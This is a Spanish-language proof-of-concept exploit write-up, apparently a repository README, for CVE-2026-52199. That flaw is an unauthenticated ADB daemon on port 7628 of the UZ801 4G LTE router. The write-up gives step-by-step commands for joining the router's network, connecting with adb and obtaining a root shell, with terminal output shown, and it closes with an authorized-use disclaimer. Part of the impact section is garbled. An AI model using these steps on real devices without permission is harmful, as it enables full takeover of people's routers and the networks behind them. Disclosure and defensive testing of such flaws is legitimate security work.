
Exploit de prueba de concepto para CVE-2026-52199: ejecución remota de código no autenticada a través del demonio ADB expuesto en el router UZ801 4G LTE. Incluye análisis de vulnerabilidad, evaluación de impacto y guía de explotación paso a paso para pruebas de seguridad autorizadas.
Existe una vulnerabilidad crítica de Control de Acceso Incorrecto en el Router 4G LTE UZ801_v2.1 OEM Genérico (Firmware V3.4.3). El dispositivo expone indebidamente un daemon de Android Debug Bridge (ADB) no autenticado (/sbin/adbd) en el puerto TCP 7628 a la red adyacente (LAN/WiFi).
Un atacante conectado a la red local del dispositivo puede explotar esta falla para evitar todos los mecanismos de autenticación, establecer una conexión ADB y ejecutar código arbitrario con privilegios de root.

/sbin/adbdLa explotación de esta vulnerabilidad conduce a un compromiso completo del sistema. El impacto incluye:
root)El proceso de explotación no requiere herramientas especiales más allá del cliente adb estándar y acceso a la red adyacente.
Paso 1: Conéctese a la red WiFi del router UZ801 (La puerta de enlace predeterminada suele ser 192.168.100.1).
Paso 2: Escanee el dispositivo en busca de puertos abiertos. El puerto 7628/TCP aparecerá como abierto.
Paso 3: Desde la máquina del atacante, inicie una conexión ADB al puerto no documentado:
$ adb connect 192.168.100.1:7628
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 192.168.100.1:7628
Paso 4: Solicite un shell interactivo:
$ adb -s 192.168.100.1:7628 shell
Paso 5: El atacante accede inmediatamente a un shell de root sin ninguna solicitud de autenticación:
root@msm8916_32_512:/ # id
uid=0(root) gid=0(root) context=u:r:su:s0
root@msm8916_32_512:/ # uname -a
Linux localhost 3.10.49 #1 SMP PREEMPT ... aarch64
Solo para fines educativos y de investigación de seguridad autorizada.
La información y la prueba de concepto proporcionadas en este repositorio están destinadas únicamente a fines educativos y para ayudar a asegurar redes. El autor (lamaper) no es responsable del mal uso de esta información. No utilice este exploit contra dispositivos o redes que no posea o para los cuales no tenga permiso explícito para probar.